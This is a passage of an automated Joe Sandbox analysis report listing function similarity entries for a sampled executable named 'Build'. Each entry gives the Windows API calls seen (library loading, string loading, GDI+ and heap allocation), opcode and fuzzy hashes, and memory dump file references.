                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1231390398-0
                                                                                                                                                                                • Opcode ID: c5c72f33371b149e2c10dcf49c2ad4c0a493740bc4d1b7d1570327f083412fe6
                                                                                                                                                                                • Instruction ID: 25841ec8f7cf3145e95df9cd362fc9b9218d19e1204497727ba2e59cd75670c1
                                                                                                                                                                                • Opcode Fuzzy Hash: c5c72f33371b149e2c10dcf49c2ad4c0a493740bc4d1b7d1570327f083412fe6
                                                                                                                                                                                • Instruction Fuzzy Hash: 0DE0D832F00905679F0987B49C15AEB73DDEA4468631440F9ED03F3300FD38DE0946A0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
                                                                                                                                                                                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1175261203-0
                                                                                                                                                                                • Opcode ID: 3e6219c323e4edf49dd73a82f4d59fd25a13d0b0785eb7cd4dcb1fb6202cfc9b
                                                                                                                                                                                • Instruction ID: 13e582050d6ef7f4955adeae1e0411f9b2be9c3e25e02dcfce70db238b935181
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e6219c323e4edf49dd73a82f4d59fd25a13d0b0785eb7cd4dcb1fb6202cfc9b
                                                                                                                                                                                • Instruction Fuzzy Hash: 95F03075900158AACB10DF69DD45DDEB7ECEF49751F0004A5BA05D3100DA74EA858B64
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadStringW.USER32(00B47BEB,?,00B41436,00B47BEB), ref: 00B505F8
                                                                                                                                                                                • LoadStringW.USER32(00B47BEB,?,00B41436), ref: 00B5060F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2948472770-0
                                                                                                                                                                                • Opcode ID: d4f9279f60f26c66f50750a567a3e9b5d178544488933be8303b3e0c1254b4a8
                                                                                                                                                                                • Instruction ID: aa4c443b053df609fcde0bed31108898b8a67e47ec28ddbf721ef064cde00ebe
                                                                                                                                                                                • Opcode Fuzzy Hash: d4f9279f60f26c66f50750a567a3e9b5d178544488933be8303b3e0c1254b4a8
                                                                                                                                                                                • Instruction Fuzzy Hash: 23F09276114219FBDF212F51EC08DAB7FAAFF49395B1484A5FD0896131DA328960EBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00B7505D,000000FF), ref: 00B5CD7D
                                                                                                                                                                                • OleUninitialize.OLE32(?,?,?,?,00B7505D,000000FF), ref: 00B5CD82
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3856339756-0
                                                                                                                                                                                • Opcode ID: 1e589e745b5b831620c1d5639d1bc5cad1a3546b9096bde0f669ace57b203afa
                                                                                                                                                                                • Instruction ID: 32fbb9eb0e67161b967226509f95c6333e027bf03272db10206bdbc2cc33f736
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e589e745b5b831620c1d5639d1bc5cad1a3546b9096bde0f669ace57b203afa
                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF05E76608A44EFC700DF19DC01F5AFBE8FB49B20F04426AE82AD3760DF34A841CA90
                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B5C36E
                                                                                                                                                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B5C375
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1918208029-0
                                                                                                                                                                                • Opcode ID: a91f5d9caf6b87c10d217b2fe13641d124abad950b08333d251330af88a6cba7
                                                                                                                                                                                • Instruction ID: 884345684ef87bce79d752227e233ac9c1609495b2157e6b2bb8bcfb39b05409
                                                                                                                                                                                • Opcode Fuzzy Hash: a91f5d9caf6b87c10d217b2fe13641d124abad950b08333d251330af88a6cba7
                                                                                                                                                                                • Instruction Fuzzy Hash: 52E06D71801208EFCB10DF99C440B99BBF8EB05311F20C09AE89693200D2B4AF449B90
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B651CA
                                                                                                                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B651D5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1660781231-0
                                                                                                                                                                                • Opcode ID: 369ea9b1b320b3b018a9b0f8aac56f0f20295fba22b7af2b5999f1fdfb4aa861
                                                                                                                                                                                • Instruction ID: 249461a07fbcc30c129d9cca643cfa02efd09c6185174f3a85f2d69ba97f215d
                                                                                                                                                                                • Opcode Fuzzy Hash: 369ea9b1b320b3b018a9b0f8aac56f0f20295fba22b7af2b5999f1fdfb4aa861
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FD0237554CF00448D3437752C1375E17C4D903770FF017C5E830A61E1DE1D88605511
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemShowWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3351165006-0
                                                                                                                                                                                • Opcode ID: 677bfb6ed48558a6132df93e4d0c57e60144bbfb9d82e0c8c605ff5008e141a2
                                                                                                                                                                                • Instruction ID: 900b385859aa84ddfaa3719ec45ba497dd0283f61e879b31f6912b54f82d428f
                                                                                                                                                                                • Opcode Fuzzy Hash: 677bfb6ed48558a6132df93e4d0c57e60144bbfb9d82e0c8c605ff5008e141a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 90C0123219C200BECB010BB0DC0AC2ABBE8ABA6212F10CA48F1A6D2060CA39C010DB11
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 431132790-0
                                                                                                                                                                                • Opcode ID: d2ace133ad7fa6f7a7c85a1220859fabb46f1ac572ab6ff677ebe37276cbdbe3
                                                                                                                                                                                • Instruction ID: d521551d5825fadc7088c1ef0ecef1e255297445427a20f32c8034ec19ea11b7
                                                                                                                                                                                • Opcode Fuzzy Hash: d2ace133ad7fa6f7a7c85a1220859fabb46f1ac572ab6ff677ebe37276cbdbe3
                                                                                                                                                                                • Instruction Fuzzy Hash: 46C15D74E442519BDF25CF28C8C47A97BE5EF06310F1809F9EC0A9F296CB259B84DB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00B41483
                                                                                                                                                                                  • Part of subcall function 00B46AE8: __EH_prolog3.LIBCMT ref: 00B46AEF
                                                                                                                                                                                  • Part of subcall function 00B4EE0F: __EH_prolog3.LIBCMT ref: 00B4EE16
                                                                                                                                                                                  • Part of subcall function 00B4668F: __EH_prolog3.LIBCMT ref: 00B46696
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 431132790-0
                                                                                                                                                                                • Opcode ID: 5a2dce6c8921256055960bdaa3341da6cbc86b42f0330f863ae8514c4296434b
                                                                                                                                                                                • Instruction ID: 49b1bea53408d14333b60e23138e803655380032180bf8741b87177d75e2f849
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a2dce6c8921256055960bdaa3341da6cbc86b42f0330f863ae8514c4296434b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E4113B1A063808ECB14DF2994802D97BE2AF69300F0845FEEC5DCF29AD7755354DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 431132790-0
                                                                                                                                                                                • Opcode ID: 30791a8c43853acab491e36edc0df676754a7bcc0be0f830d4a7c3cb54866dad
                                                                                                                                                                                • Instruction ID: be8f877a314bcfe2f31abb14f57d3e61a88a9c38b9f74e2e926d159a983c2563
                                                                                                                                                                                • Opcode Fuzzy Hash: 30791a8c43853acab491e36edc0df676754a7bcc0be0f830d4a7c3cb54866dad
                                                                                                                                                                                • Instruction Fuzzy Hash: 532106B1E406119FDB24EFB8CC5175A76E8FF14305F0406FAE905EB292D7749940C7A8
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B6D348
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                                • Opcode ID: 271e1a9137368c90dc9ea695fb7baa982e810bd0ca1c57383208dfb8fd66e6e2
                                                                                                                                                                                • Instruction ID: 8bddc2b26cb5e4c87900191b58a38462028b0c033fed40d794a33f90029bebc4
                                                                                                                                                                                • Opcode Fuzzy Hash: 271e1a9137368c90dc9ea695fb7baa982e810bd0ca1c57383208dfb8fd66e6e2
                                                                                                                                                                                • Instruction Fuzzy Hash: 9111C637F006259F9B259F2DEC8099A73E5EB8936071642A0FD25AB354DE34EC01C7D6
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B6D786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B6B9D3,00000001,00000364,?,00B6688D,?,?,00B850C4), ref: 00B6D7C7
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EB35
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 614378929-0
                                                                                                                                                                                • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                                                                                                                • Instruction ID: 7d8b809abffa8848af1d9d2158e07c6af64aaa4a74bc982e38c2667f77d8b4ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                                                                                                                • Instruction Fuzzy Hash: A5014576200345ABE321CF69C882D9AFBEDFB85330F25066DE19987280EA34A805C774
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 431132790-0
                                                                                                                                                                                • Opcode ID: 52a56834afb5fbc48b096e5f188e03fa6ed41b371219e1c0078a9c3dbe2a962f
                                                                                                                                                                                • Instruction ID: 4b01af93cdae98511238e6db2dd72a46f07ff3ce64ffcf219d2fd266785de28c
                                                                                                                                                                                • Opcode Fuzzy Hash: 52a56834afb5fbc48b096e5f188e03fa6ed41b371219e1c0078a9c3dbe2a962f
                                                                                                                                                                                • Instruction Fuzzy Hash: A0018436D4062A5BCB25EE68C8929BEB3F2EF44700B054599FD11AB341CB358E00A691
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B6B9D3,00000001,00000364,?,00B6688D,?,?,00B850C4), ref: 00B6D7C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: b249a1bb902dac0f51f8771dfba8fab95ee3e993e706bbf95c44a71e6c7947b2
                                                                                                                                                                                • Instruction ID: eaafea2719d31a3bc45a717b0365f2c959fdc822026c0203376a7678e6b11caa
                                                                                                                                                                                • Opcode Fuzzy Hash: b249a1bb902dac0f51f8771dfba8fab95ee3e993e706bbf95c44a71e6c7947b2
                                                                                                                                                                                • Instruction Fuzzy Hash: A9F0B431B4262466DB216F629C41B7B77D8DF417A0F1441D1E808D6595CE28DD4086E3
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
